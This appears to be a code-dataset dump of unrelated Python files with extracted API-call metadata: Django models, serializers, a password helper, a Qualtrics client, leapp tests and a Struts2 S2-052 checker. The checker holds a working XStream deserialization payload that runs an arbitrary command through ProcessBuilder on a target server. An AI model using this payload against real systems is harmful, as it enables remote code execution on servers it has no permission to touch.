'rest_framework.exceptions.PermissionDenied', 'PermissionDenied', ([], {'detail': '"""您没有权限"""'}), "(detail='您没有权限')\n", (15850, 15866), False, 'from rest_framework.exceptions import PermissionDenied\n'), ((16207, 16221), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (16219, 16221), False, 'from django.utils import timezone\n'), ((16224, 16251), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(30)'}), '(days=30)\n', (16242, 16251), False, 'import datetime\n'), ((18198, 18228), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': '"""创建成功"""'}), "(message='创建成功')\n", (18212, 18228), False, 'from libs.response import JsonResponseV1\n'), ((18764, 18794), 'libs.response.JsonResponseV1', 'JsonResponseV1', ([], {'message': '"""更新成功"""'}), "(message='更新成功')\n", (18778, 18794), False, 'from libs.response import JsonResponseV1\n'), ((19460, 19511), 'sqlorders.models.ReleaseVersions.objects.get', 'models.ReleaseVersions.objects.get', ([], {'version': 'version'}), '(version=version)\n', (19494, 19511), False, 'from sqlorders import models, serializers\n'), ((9339, 9395), 'rest_framework.exceptions.PermissionDenied', 'PermissionDenied', ([], {'detail': '"""您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面"""'}), "(detail='您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面')\n", (9355, 9395), False, 'from rest_framework.exceptions import PermissionDenied\n'), ((11740, 11796), 'rest_framework.exceptions.PermissionDenied', 'PermissionDenied', ([], {'detail': '"""您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面"""'}), "(detail='您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面')\n", (11756, 11796), False, 'from rest_framework.exceptions import PermissionDenied\n'), ((15488, 15521), 'base64.b64decode', 'base64.b64decode', (['base64_filename'], {}), '(base64_filename)\n', (15504, 15521), False, 'import base64\n'), ((18577, 18629), 'sqlorders.models.ReleaseVersions.objects.get', 'models.ReleaseVersions.objects.get', ([], {'pk': "kwargs['key']"}), "(pk=kwargs['key'])\n", (18611, 18629), False, 'from sqlorders import models, serializers\n'), ((8027, 8088), 'sqlorders.models.DbOrdersExecuteTasks.objects.filter', 'models.DbOrdersExecuteTasks.objects.filter', ([], {'order_id': 'order_id'}), '(order_id=order_id)\n', (8069, 8088), False, 'from sqlorders import models, serializers\n'), ((15547, 15603), 'sqlorders.models.DbExportFiles.objects.filter', 'models.DbExportFiles.objects.filter', ([], {'file_name': 'file_name'}), '(file_name=file_name)\n', (15582, 15603), False, 'from sqlorders import models, serializers\n'), ((15724, 15779), 'sqlorders.models.DbOrdersExecuteTasks.objects.get', 'models.DbOrdersExecuteTasks.objects.get', ([], {'pk': 'obj.task_id'}), '(pk=obj.task_id)\n', (15763, 15779), False, 'from sqlorders import models, serializers\n'), ((16548, 16562), 'django.utils.timezone.now', 'timezone.now', ([], {}), '()\n', (16560, 16562), False, 'from django.utils import timezone\n'), ((9142, 9165), 'json.loads', 'json.loads', (['obj.auditor'], {}), '(obj.auditor)\n', (9152, 9165), False, 'import json\n'), ((9226, 9250), 'json.loads', 'json.loads', (['obj.reviewer'], {}), '(obj.reviewer)\n', (9236, 9250), False, 'import json\n'), ((11543, 11566), 'json.loads', 'json.loads', (['obj.auditor'], {}), '(obj.auditor)\n', (11553, 11566), False, 'import json\n'), ((11627, 11651), 'json.loads', 'json.loads', (['obj.reviewer'], {}), '(obj.reviewer)\n', (11637, 11651), False, 'import json\n'), ((16272, 16342), 'sqlorders.models.ReleaseVersions.objects.filter', 'models.ReleaseVersions.objects.filter', ([], {'expire_time__gte': 'before_30_days'}), '(expire_time__gte=before_30_days)\n', (16309, 16342), False, 'from sqlorders import models, serializers\n'), ((8882, 8941), 'sqlorders.models.DbOrdersExecuteTasks.objects.filter', 'models.DbOrdersExecuteTasks.objects.filter', ([], {'task_id': 'task_id'}), '(task_id=task_id)\n', (8924, 8941), False, 'from sqlorders import models, serializers\n'), ((11283, 11342), 'sqlorders.models.DbOrdersExecuteTasks.objects.filter', 'models.DbOrdersExecuteTasks.objects.filter', ([], {'task_id': 'task_id'}), '(task_id=task_id)\n', (11325, 11342), False, 'from sqlorders import models, serializers\n')] |
# Importing Fernet class
from cryptography.fernet import Fernet
# Importing dump and load function
from pickle import dump,load
# To generate a strong pw
def generate_pw():
from random import choice
choices = list("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()_-+=.,/<>?;:\\|[]}{")
pw = ""
for i in range(25):
pw += choice(choices)
return pw
del pw,choice
# To get master pw from the file
def get_masterpw():
# Opening the file storing master pw
with open("key.key",'rb') as file:
# Loading data
keys = load(file)
# Master pw is converted from bytes to string
key = keys[0].decode()
del keys
# Return keys
return key
# To get key from the file
def get_key():
# Opening the file storing master pw
with open("key.key",'rb') as file:
# Loading data
keys = load(file)
# Key is converted from bytes to string
key = keys[1].decode()
del keys
# Return keys
return key
# To store master pw in the file
def add_keys(masterpw,key):
# Opening the file to store master pw
with open("key.key",'wb') as file:
# Making list of value to upload
# key is already in bytes # Converting to bytes is not necessary
keys = [masterpw.encode(),key]
# Dumping the master pw to file
dump(keys,file)
# Deleting the variable
del masterpw,key,keys
# Checking if user is running program for first time
def is_1st_time():
# Trying to open bytes file
# If file is opened means program was executed once or more
try:
with open("key.key",'rb') as file:
pass
return False
# FileNotFound means its first time
# Or either its not in directory of this file or user deleted it :) #
except FileNotFoundError:
return True
# Function to copy pw to clipboard
def copy2clip(pw):
# Importing copy function
from pyperclip import copy
# Copying pw to clipboard
copy(pw)
del pw,copy
# Encrypting the text
def encrypt(text, key):
try:
# Defining Fernet(class) using the key
fernet = Fernet(key)
# Encryption # Text is converted to bytes
encrypted_text = fernet.encrypt(text.encode())
del key
# Return encrypted text
return encrypted_text
# Error message if any
except Exception as e:
print(f"Error occured:{e}\nProcess failed!")
# Decrypting the text
def decrypt(text, key):
try:
# Defining Fernet(class) using the key
fernet = Fernet(key)
# Decryption # Text is converted from bytes to string
decrypted_text = fernet.decrypt(text).decode()
del key
# Return decrypted text
return decrypted_text
# Error message if any
except Exception as e:
print(f"Error occured:{e}\nProcess failed!") | [
"random.choice",
"pickle.dump",
"pickle.load",
"pyperclip.copy",
"cryptography.fernet.Fernet"
]
| [((2100, 2108), 'pyperclip.copy', 'copy', (['pw'], {}), '(pw)\n', (2104, 2108), False, 'from pyperclip import copy\n'), ((379, 394), 'random.choice', 'choice', (['choices'], {}), '(choices)\n', (385, 394), False, 'from random import choice\n'), ((608, 618), 'pickle.load', 'load', (['file'], {}), '(file)\n', (612, 618), False, 'from pickle import dump, load\n'), ((927, 937), 'pickle.load', 'load', (['file'], {}), '(file)\n', (931, 937), False, 'from pickle import dump, load\n'), ((1427, 1443), 'pickle.dump', 'dump', (['keys', 'file'], {}), '(keys, file)\n', (1431, 1443), False, 'from pickle import dump, load\n'), ((2252, 2263), 'cryptography.fernet.Fernet', 'Fernet', (['key'], {}), '(key)\n', (2258, 2263), False, 'from cryptography.fernet import Fernet\n'), ((2688, 2699), 'cryptography.fernet.Fernet', 'Fernet', (['key'], {}), '(key)\n', (2694, 2699), False, 'from cryptography.fernet import Fernet\n')] |
from django.db import models
from django.utils import timezone
# Course Category
class Course_category(models.Model):
category_id = models.AutoField(primary_key=True)
category_name = models.CharField(max_length=100)
date_of_creation = models.DateTimeField(default=timezone.now)
# Course Subcategory
class Course_subcategory(models.Model):
subcategory_id = models.AutoField(primary_key=True)
category = models.ForeignKey(Course_category, on_delete=models.CASCADE)
subcategory_name = models.CharField(max_length=100)
date_of_creation = models.DateTimeField(default=timezone.now)
# Course
class Course(models.Model):
course_id = models.AutoField(primary_key=True)
subcategory = models.ForeignKey(Course_subcategory, on_delete=models.CASCADE)
subcategory_name = models.CharField(max_length=100)
category_name = models.CharField(max_length=100)
course_name = models.CharField(max_length=100)
date_of_creation = models.DateTimeField(default=timezone.now)
course_description = models.TextField(default="")
course_difficulty = models.CharField(max_length=30)
# Course resources
class Course_resource(models.Model):
course = models.ForeignKey(Course, on_delete=models.CASCADE)
resourse_content = models.TextField(default="NIL")
resourse_name = models.CharField(max_length=100)
resourse_link = models.CharField(max_length=200)
resourse_length = models.CharField(max_length=10)
date_of_creation = models.DateTimeField(default=timezone.now)
| [
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.db.models.AutoField",
"django.db.models.DateTimeField",
"django.db.models.CharField"
]
| [((137, 171), 'django.db.models.AutoField', 'models.AutoField', ([], {'primary_key': '(True)'}), '(primary_key=True)\n', (153, 171), False, 'from django.db import models\n'), ((192, 224), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (208, 224), False, 'from django.db import models\n'), ((248, 290), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now'}), '(default=timezone.now)\n', (268, 290), False, 'from django.db import models\n'), ((375, 409), 'django.db.models.AutoField', 'models.AutoField', ([], {'primary_key': '(True)'}), '(primary_key=True)\n', (391, 409), False, 'from django.db import models\n'), ((425, 485), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Course_category'], {'on_delete': 'models.CASCADE'}), '(Course_category, on_delete=models.CASCADE)\n', (442, 485), False, 'from django.db import models\n'), ((509, 541), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (525, 541), False, 'from django.db import models\n'), ((565, 607), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now'}), '(default=timezone.now)\n', (585, 607), False, 'from django.db import models\n'), ((662, 696), 'django.db.models.AutoField', 'models.AutoField', ([], {'primary_key': '(True)'}), '(primary_key=True)\n', (678, 696), False, 'from django.db import models\n'), ((715, 778), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Course_subcategory'], {'on_delete': 'models.CASCADE'}), '(Course_subcategory, on_delete=models.CASCADE)\n', (732, 778), False, 'from django.db import models\n'), ((802, 834), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (818, 834), False, 'from django.db import models\n'), ((855, 887), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (871, 887), False, 'from django.db import models\n'), ((906, 938), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (922, 938), False, 'from django.db import models\n'), ((962, 1004), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now'}), '(default=timezone.now)\n', (982, 1004), False, 'from django.db import models\n'), ((1030, 1058), 'django.db.models.TextField', 'models.TextField', ([], {'default': '""""""'}), "(default='')\n", (1046, 1058), False, 'from django.db import models\n'), ((1083, 1114), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)'}), '(max_length=30)\n', (1099, 1114), False, 'from django.db import models\n'), ((1185, 1236), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Course'], {'on_delete': 'models.CASCADE'}), '(Course, on_delete=models.CASCADE)\n', (1202, 1236), False, 'from django.db import models\n'), ((1260, 1291), 'django.db.models.TextField', 'models.TextField', ([], {'default': '"""NIL"""'}), "(default='NIL')\n", (1276, 1291), False, 'from django.db import models\n'), ((1312, 1344), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (1328, 1344), False, 'from django.db import models\n'), ((1365, 1397), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (1381, 1397), False, 'from django.db import models\n'), ((1420, 1451), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(10)'}), '(max_length=10)\n', (1436, 1451), False, 'from django.db import models\n'), ((1475, 1517), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'timezone.now'}), '(default=timezone.now)\n', (1495, 1517), False, 'from django.db import models\n')] |
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
urlpatterns = [
# Examples:
# url(r'^$', 'evetool.views.home', name='home'),
url(r'^', include('users.urls')),
url(r'^', include('apis.urls')),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| [
"django.conf.urls.include",
"django.conf.urls.static.static"
]
| [((283, 346), 'django.conf.urls.static.static', 'static', (['settings.STATIC_URL'], {'document_root': 'settings.STATIC_ROOT'}), '(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n', (289, 346), False, 'from django.conf.urls.static import static\n'), ((218, 239), 'django.conf.urls.include', 'include', (['"""users.urls"""'], {}), "('users.urls')\n", (225, 239), False, 'from django.conf.urls import include, url\n'), ((256, 276), 'django.conf.urls.include', 'include', (['"""apis.urls"""'], {}), "('apis.urls')\n", (263, 276), False, 'from django.conf.urls import include, url\n')] |
from rest_framework import serializers
from applications.models import Application
class ApplicationSerializer(serializers.Serializer):
content = serializers.JSONField()
portfolio = serializers.FileField()
class ApplicationAdminSerializer(serializers.ModelSerializer):
class Meta:
model = Application
fields = ['content', 'user', 'status', 'created_at', 'updated_at', 'recruits']
class ApplicationAdminPatchSerializer(serializers.ModelSerializer):
class Meta:
model = Application
fields = ['status'] | [
"rest_framework.serializers.FileField",
"rest_framework.serializers.JSONField"
]
| [((154, 177), 'rest_framework.serializers.JSONField', 'serializers.JSONField', ([], {}), '()\n', (175, 177), False, 'from rest_framework import serializers\n'), ((194, 217), 'rest_framework.serializers.FileField', 'serializers.FileField', ([], {}), '()\n', (215, 217), False, 'from rest_framework import serializers\n')] |
from pathlib import Path
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
# api_token = "<KEY>"
# brand_center = "mdanderson.co1"
# data_center = "iad1"
# headers = {"x-api-token": api_token}
class QualtricsTool:
"""Data model to manage Qualtrics-related tools
Parameters:
-----------
api_token: str, the API token for the user
data_center: str, the data center for the user
brand_center: str, the brand center for the user
"""
def __init__(self, api_token=None, data_center=None, brand_center=None):
self.api_token = api_token
self.data_center = data_center
self.brand_center = brand_center
@property
def api_headers(self):
"""The default API headers"""
return {"x-api-token": self.api_token}
@property
def base_url(self):
"""The default base URL"""
return f"https://{self.data_center}.qualtrics.com"
@property
def api_base_url(self):
"""The default base API URL"""
return f"{self.base_url}/API/v3"
def upload_images_api(self,
local_image_folder,
library_id,
creating_full_url=True,
qualtrics_folder=None,
filename_pattern="*"):
"""Upload images from the local folder to the Qualtrics server
:param local_image_folder: str, Path, the local folder containing the images
:param library_id: str, Qualtrics library ID number
:param creating_full_url: bool, whether returns the IDs only or the full URLs
:param qualtrics_folder: str, the Qualtrics Graphics folder for the uploaded images
:param filename_pattern: str, the pattern using which to select the images for uploading
:return list[str], the list of image IDs or URLs
"""
upload_url = f"{self.api_base_url}/libraries/{library_id}/graphics"
image_urls = list()
for file in Path(local_image_folder).glob(filename_pattern):
file_type = Path(file)[1:]
if file_type not in ("png", "gif", "jpg", "jpeg"):
raise ValueError("Qualtrics only accepts PNG, GIF, and JPEG images.")
encoded_fields = {'file': (file.name, open(file, 'rb'), f'image/{file_type}')}
image_url_id = self._upload_image(encoded_fields, qualtrics_folder, upload_url, file, creating_full_url)
image_urls.append(image_url_id)
return image_urls
def upload_images_web(self,
image_files,
library_id,
creating_full_url,
qualtrics_folder,
image_type):
"""Upload images from the web app to the Qualtrics server
:param image_files: Bytes, the uploaded bytes data from the web app
:param library_id: str, Qualtrics library ID number
:param creating_full_url: bool, whether returns the IDs only or the full URLs
:param qualtrics_folder: str, the Qualtrics Graphics folder for the uploaded images
:param image_type: str, the image file type
:return list[str], the list of image IDs or URLs
"""
image_urls = list()
upload_url = f"{self.api_base_url}/libraries/{library_id}/graphics"
file_count_digit = len(str(len(image_files)))
for file_i, file in enumerate(image_files, start=1):
encoded_fields = {'file': (f"image{file_i:0>{file_count_digit}}.{image_type}", file, f'image/{image_type}')}
image_url_id = self._upload_image(encoded_fields, qualtrics_folder, upload_url, file, creating_full_url)
image_urls.append(image_url_id)
return image_urls
def _upload_image(self, encoded_fields, qualtrics_folder, upload_url, file, creating_full_url):
if qualtrics_folder:
encoded_fields['folder'] = qualtrics_folder
mp_encoder = MultipartEncoder(fields=encoded_fields)
post_request = requests.post(
upload_url,
data=mp_encoder,
headers={'Content-Type': mp_encoder.content_type, **self.api_headers}
)
try:
image_url_id = post_request.json()['result']['id']
except KeyError:
raise Exception(f"Failed to upload image {file.name}")
if creating_full_url:
image_url_id = f"{self.base_url}/ControlPanel/Graphic.php?IM={image_url_id}"
return image_url_id
def delete_images(self, library_id, image_url_ids):
"""Delete images from the specified library
:param library_id: str, the library ID number
:param image_url_ids: list[str], the image IDs or full URLs
:return dict, the deletion report"""
report = dict()
for image_url_id in image_url_ids:
if image_url_id.find("=") > 0:
image_url_id = image_url_id[image_url_id.index("=") + 1:]
url = f'{self.api_base_url}/libraries/{library_id}/graphics/{image_url_id}'
delete_response = requests.delete(url, headers=self.api_headers)
try:
http_status = delete_response.json()['meta']['httpStatus']
except KeyError:
raise Exception(f"Failed to delete image: {image_url_id}")
else:
report[image_url_id] = "Deleted" if http_status.startswith('200') else "Error"
return report
def create_survey(self, template_json):
"""Create the survey using the JSON template
:param template_json: str in the JSON format, the JSON file for the qsf file
:return str, the created Survey ID number
"""
upload_url = f"{self.api_base_url}/survey-definitions"
creation_response = requests.post(
upload_url,
json=template_json,
headers={**self.api_headers, "content-type": "application/json"}
)
try:
survey_id = creation_response.json()['result']['SurveyID']
except KeyError:
raise Exception("Couldn't create the survey. Please check the params.")
return survey_id
def delete_survey(self, survey_id):
"""Delete the survey
:param survey_id: str, the survey ID number
:return dict, the deletion report
"""
report = dict()
delete_url = f"{self.api_base_url}/survey-definitions/{survey_id}"
delete_response = requests.delete(delete_url, headers=self.api_headers)
try:
http_status = delete_response.json()['meta']['httpStatus']
except KeyError:
raise Exception(f"Failed to delete survey: {survey_id}")
else:
report[survey_id] = "Deleted" if http_status.startswith('200') else "Error"
return report
def export_responses(self, survey_id, file_format="csv", data_folder=None):
"""Export responses from the Qualtrics survey"""
download_url = f"{self.api_base_url}/surveys/{survey_id}/export-responses/"
download_payload = f'{{"format": "{file_format}"}}'
download_response = requests.post(
download_url,
data=download_payload,
headers={**self.api_headers, "content-type": "application/json"}
)
try:
progress_id = download_response.json()["result"]["progressId"]
file_id = self._monitor_progress(download_url, progress_id)
file_content = self._download_file(download_url, file_id)
except KeyError:
raise Exception("Can't download the responses. Please check the params.")
return file_content
def _monitor_progress(self, download_url, progress_id):
progress_status = "inProgress"
while progress_status != "complete" and progress_status != "failed":
progress_response = requests.get(download_url + progress_id, headers=self.api_headers)
progress_status = progress_response.json()["result"]["status"]
return progress_response.json()["result"]["fileId"]
def _download_file(self, download_url, file_id):
file_url = f"{download_url}/{file_id}/file"
file_response = requests.get(file_url, headers=self.api_headers, stream=True)
return file_response.content
| [
"requests.post",
"pathlib.Path",
"requests_toolbelt.multipart.encoder.MultipartEncoder",
"requests.get",
"requests.delete"
]
| [((4027, 4066), 'requests_toolbelt.multipart.encoder.MultipartEncoder', 'MultipartEncoder', ([], {'fields': 'encoded_fields'}), '(fields=encoded_fields)\n', (4043, 4066), False, 'from requests_toolbelt.multipart.encoder import MultipartEncoder\n'), ((4090, 4207), 'requests.post', 'requests.post', (['upload_url'], {'data': 'mp_encoder', 'headers': "{'Content-Type': mp_encoder.content_type, **self.api_headers}"}), "(upload_url, data=mp_encoder, headers={'Content-Type':\n mp_encoder.content_type, **self.api_headers})\n", (4103, 4207), False, 'import requests\n'), ((5865, 5980), 'requests.post', 'requests.post', (['upload_url'], {'json': 'template_json', 'headers': "{**self.api_headers, 'content-type': 'application/json'}"}), "(upload_url, json=template_json, headers={**self.api_headers,\n 'content-type': 'application/json'})\n", (5878, 5980), False, 'import requests\n'), ((6555, 6608), 'requests.delete', 'requests.delete', (['delete_url'], {'headers': 'self.api_headers'}), '(delete_url, headers=self.api_headers)\n', (6570, 6608), False, 'import requests\n'), ((7225, 7346), 'requests.post', 'requests.post', (['download_url'], {'data': 'download_payload', 'headers': "{**self.api_headers, 'content-type': 'application/json'}"}), "(download_url, data=download_payload, headers={**self.\n api_headers, 'content-type': 'application/json'})\n", (7238, 7346), False, 'import requests\n'), ((8306, 8367), 'requests.get', 'requests.get', (['file_url'], {'headers': 'self.api_headers', 'stream': '(True)'}), '(file_url, headers=self.api_headers, stream=True)\n', (8318, 8367), False, 'import requests\n'), ((5147, 5193), 'requests.delete', 'requests.delete', (['url'], {'headers': 'self.api_headers'}), '(url, headers=self.api_headers)\n', (5162, 5193), False, 'import requests\n'), ((7970, 8036), 'requests.get', 'requests.get', (['(download_url + progress_id)'], {'headers': 'self.api_headers'}), '(download_url + progress_id, headers=self.api_headers)\n', (7982, 8036), False, 'import requests\n'), ((2031, 2055), 'pathlib.Path', 'Path', (['local_image_folder'], {}), '(local_image_folder)\n', (2035, 2055), False, 'from pathlib import Path\n'), ((2104, 2114), 'pathlib.Path', 'Path', (['file'], {}), '(file)\n', (2108, 2114), False, 'from pathlib import Path\n')] |
#!/usr/bin/env python3
from app.lib.utils.request import request
from app.lib.utils.encode import base64encode
from app.lib.utils.common import get_capta, get_useragent
class S2_052_BaseVerify:
def __init__(self, url):
self.info = {
'name': 'S2-052漏洞,又名CVE-2017-9805漏洞',
'description': 'Struts2 Remote Code Execution Vulnerability, Struts 2.1.6 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12',
'date': '2017-09-05',
'exptype': 'check',
'type': 'RCE'
}
self.url = url
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
self.capta = get_capta()
self.headers = {
'User-Agent': get_useragent(),
'Content-Type': "application/xml",
}
self.payload ='''
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
{cmd}
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
'''
def check(self):
"""
检测是否存在漏洞
:param:
:return bool True or False: 是否存在漏洞
"""
try:
self.check_payload = self.payload.format(cmd = '<string>calc</string>')
check_req = request.post(self.url, headers = self.headers, data = self.check_payload)
if check_req.status_code == 500 and 'java.security.Provider$Service' in check_req.text:
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == "__main__":
S2_052 = S2_052_BaseVerify('http://127.0.0.1:8088/struts2_rest_showcase_war_exploded/orders/3') | [
"app.lib.utils.common.get_capta",
"app.lib.utils.request.request.post",
"app.lib.utils.common.get_useragent"
]
| [((700, 711), 'app.lib.utils.common.get_capta', 'get_capta', ([], {}), '()\n', (709, 711), False, 'from app.lib.utils.common import get_capta, get_useragent\n'), ((772, 787), 'app.lib.utils.common.get_useragent', 'get_useragent', ([], {}), '()\n', (785, 787), False, 'from app.lib.utils.common import get_capta, get_useragent\n'), ((4668, 4737), 'app.lib.utils.request.request.post', 'request.post', (['self.url'], {'headers': 'self.headers', 'data': 'self.check_payload'}), '(self.url, headers=self.headers, data=self.check_payload)\n', (4680, 4737), False, 'from app.lib.utils.request import request\n')] |
import setuptools
from hugdatafast.__init__ import __version__
with open("README.md", "r") as fh:
long_description = fh.read()
REQUIRED_PKGS = [
'fastai>=2.0.8',
'fastscore>=1.0.1', # change of store_attr api
'datasets',
]
setuptools.setup(
name="hugdatafast",
version=__version__,
author="<NAME>",
author_email="<EMAIL>",
description="The elegant bridge between hugginface data and fastai",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/richarddwang/hugdatafast",
license='Apache 2.0',
packages=setuptools.find_packages(),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
python_requires='>=3.6',
install_requires=REQUIRED_PKGS,
keywords='datasets machine learning datasets metrics fastai huggingface',
) | [
"setuptools.find_packages"
]
| [((615, 641), 'setuptools.find_packages', 'setuptools.find_packages', ([], {}), '()\n', (639, 641), False, 'import setuptools\n')] |
import pytest
from leapp.repository.actor_definition import ActorDefinition, ActorInspectionFailedError, MultipleActorsError
from leapp.exceptions import UnsupportedDefinitionKindError
from leapp.repository import DefinitionKind
from helpers import repository_dir
import logging
import mock
_FAKE_META_DATA = {
'description': 'Fake Description',
'class_name': 'FakeActor',
'name': 'fake-actor',
'path': 'actors/test',
'tags': (),
'consumes': (),
'produces': (),
'dialogs': (),
}
def test_actor_definition(repository_dir):
with repository_dir.as_cwd():
logger = logging.getLogger('leapp.actor.test')
with mock.patch.object(logger, 'log') as log_mock:
definition = ActorDefinition('actors/test', '.', log=log_mock)
for kind in set(DefinitionKind.REPO_WHITELIST + DefinitionKind.ACTOR_WHITELIST):
if kind in DefinitionKind.ACTOR_WHITELIST:
definition.add(kind, '.')
else:
with pytest.raises(UnsupportedDefinitionKindError):
definition.add(kind, '.')
log_mock.error.assert_called_with(
"Attempt to add item type %s to actor that is not supported", kind.name)
log_mock.reset_mock()
with mock.patch('leapp.repository.actor_definition.get_actor_metadata', return_value=_FAKE_META_DATA):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[True]):
definition._module = True
assert definition.consumes == _FAKE_META_DATA['consumes']
assert definition.produces == _FAKE_META_DATA['produces']
assert definition.tags == _FAKE_META_DATA['tags']
assert definition.class_name == _FAKE_META_DATA['class_name']
assert definition.dialogs == _FAKE_META_DATA['dialogs']
assert definition.name == _FAKE_META_DATA['name']
assert definition.description == _FAKE_META_DATA['description']
dumped = definition.dump()
assert dumped.pop('path') == _FAKE_META_DATA['path']
assert dumped.pop('name') == definition.name
assert dumped.pop('files') == ('.',)
assert dumped.pop('libraries') == ('.',)
assert dumped.pop('tests') == ('.',)
assert dumped.pop('tools') == ('.',)
# Assert to ensure we covered all keys
assert not dumped
with pytest.raises(ActorInspectionFailedError):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[]):
definition._discovery = None
definition.discover()
with pytest.raises(ActorInspectionFailedError):
with mock.patch('leapp.repository.actor_definition.get_actors') as mocked_actors:
mocked_actors.side_effect = RuntimeError('Test error')
definition._discovery = None
definition.discover()
with pytest.raises(MultipleActorsError):
with mock.patch('leapp.repository.actor_definition.get_actor_metadata', return_value=_FAKE_META_DATA):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[True, True]):
definition._discovery = None
definition.discover()
| [
"logging.getLogger",
"mock.patch",
"leapp.repository.actor_definition.ActorDefinition",
"mock.patch.object",
"pytest.raises",
"helpers.repository_dir.as_cwd"
]
| [((567, 590), 'helpers.repository_dir.as_cwd', 'repository_dir.as_cwd', ([], {}), '()\n', (588, 590), False, 'from helpers import repository_dir\n'), ((609, 646), 'logging.getLogger', 'logging.getLogger', (['"""leapp.actor.test"""'], {}), "('leapp.actor.test')\n", (626, 646), False, 'import logging\n'), ((660, 692), 'mock.patch.object', 'mock.patch.object', (['logger', '"""log"""'], {}), "(logger, 'log')\n", (677, 692), False, 'import mock\n'), ((731, 780), 'leapp.repository.actor_definition.ActorDefinition', 'ActorDefinition', (['"""actors/test"""', '"""."""'], {'log': 'log_mock'}), "('actors/test', '.', log=log_mock)\n", (746, 780), False, 'from leapp.repository.actor_definition import ActorDefinition, ActorInspectionFailedError, MultipleActorsError\n'), ((1334, 1434), 'mock.patch', 'mock.patch', (['"""leapp.repository.actor_definition.get_actor_metadata"""'], {'return_value': '_FAKE_META_DATA'}), "('leapp.repository.actor_definition.get_actor_metadata',\n return_value=_FAKE_META_DATA)\n", (1344, 1434), False, 'import mock\n'), ((2650, 2691), 'pytest.raises', 'pytest.raises', (['ActorInspectionFailedError'], {}), '(ActorInspectionFailedError)\n', (2663, 2691), False, 'import pytest\n'), ((2900, 2941), 'pytest.raises', 'pytest.raises', (['ActorInspectionFailedError'], {}), '(ActorInspectionFailedError)\n', (2913, 2941), False, 'import pytest\n'), ((3225, 3259), 'pytest.raises', 'pytest.raises', (['MultipleActorsError'], {}), '(MultipleActorsError)\n', (3238, 3259), False, 'import pytest\n'), ((1453, 1532), 'mock.patch', 'mock.patch', (['"""leapp.repository.actor_definition.get_actors"""'], {'return_value': '[True]'}), "('leapp.repository.actor_definition.get_actors', return_value=[True])\n", (1463, 1532), False, 'import mock\n'), ((2714, 2789), 'mock.patch', 'mock.patch', (['"""leapp.repository.actor_definition.get_actors"""'], {'return_value': '[]'}), "('leapp.repository.actor_definition.get_actors', return_value=[])\n", (2724, 2789), False, 'import mock\n'), ((2964, 3022), 